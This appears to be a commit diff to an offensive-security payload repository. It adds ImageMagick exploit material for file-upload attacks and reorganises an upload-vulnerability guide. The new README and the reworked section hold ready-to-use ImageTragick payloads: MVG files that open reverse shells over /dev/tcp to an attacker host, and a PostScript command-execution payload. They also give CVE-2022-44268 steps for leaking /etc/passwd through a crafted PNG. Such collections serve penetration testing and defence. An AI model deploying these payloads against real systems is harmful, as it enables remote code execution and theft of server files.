ImageMagick Typo

Methodology and Resources/Active Directory Attack.md

@@ -4430,4 +4430,5 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
 * [ADIDNS Revisited – WPAD, GQBL, and More - December 5, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/)
 * [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/)
 * [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse)
-* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
+* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
+* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html)

Upload Insecure Files/Picture ImageMagick/README.md

@@ -0,0 +1,52 @@
+# ImageMagick Exploits
+
+## ImageTragik Exploit v1
+
+Simple reverse shell
+
+```powershell
+push graphic-context
+encoding "UTF-8"
+viewbox 0 0 1 1
+affine 1 0 0 1 0 0
+push graphic-context
+image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
+pop graphic-context
+pop graphic-context
+```
+
+## ImageTragik Exploit v2
+
+Simple `id` payload
+
+```powershell
+%!PS
+userdict /setpagedevice undef
+save
+legal
+{ null restore } stopped { pop } if
+{ legal } stopped { pop } if
+restore
+mark /OutputFile (%pipe%id) currentdevice putdeviceprops
+```
+
+then use `convert shellexec.jpeg whatever.gif`
+
+
+## CVE-2022-44268
+
+Information Disclosure: embedded the content of an arbitrary remote file
+
+* Generate the payload
+    ```ps1
+    apt-get install pngcrush imagemagick exiftool exiv2 -y
+    pngcrush -text a "profile" "/etc/passwd" exploit.png
+    ```
+* Trigger the exploit by uploading the file. The backend might use something like `convert pngout.png pngconverted.png`
+* Download the converted picture and inspect its content with: `identify -verbose pngconverted.png`
+* Convert the exfiltrated data: `python3 -c 'print(bytes.fromhex("HEX_FROM_FILE").decode("utf-8"))'` 
+
+
+## Thanks to
+
+* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)

Upload Insecure Files/README.md

@@ -11,7 +11,7 @@
     * [Filename vulnerabilities](#filename-vulnerabilities)
     * [Picture compression](#picture-compression-)
     * [Configuration Files](#configuration-files)
-    * [CVE - Image Tragik](#cve---image-tragik)
+    * [CVE - ImageMagick](#cve---imagemagick)
     * [CVE - FFMpeg](#cve---ffmpeg)
     * [ZIP Archive](#zip-archive)
     * [Jetty RCE](#jetty-rce)
@@ -161,18 +161,19 @@ Alternatively you may be able to upload a JSON file with a custom scripts, try t
     }
     ```
 
-### CVE - Image Tragik
+### CVE - ImageMagick
 
-Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
+If the backend is using ImageMagick to resize/convert user images, you can try to exploit well-known vulnerabilities such as ImageTragik.
 
-```powershell
-push graphic-context
-viewbox 0 0 640 480
-fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
-pop graphic-context
-```
+* ImageTragik example: Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
+    ```powershell
+    push graphic-context
+    viewbox 0 0 640 480
+    fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
+    pop graphic-context
+    ```
 
-More payload in the folder `Picture Image Magik`
+More payloads in the folder `Picture ImageMagick`
 
 ### CVE - FFMpeg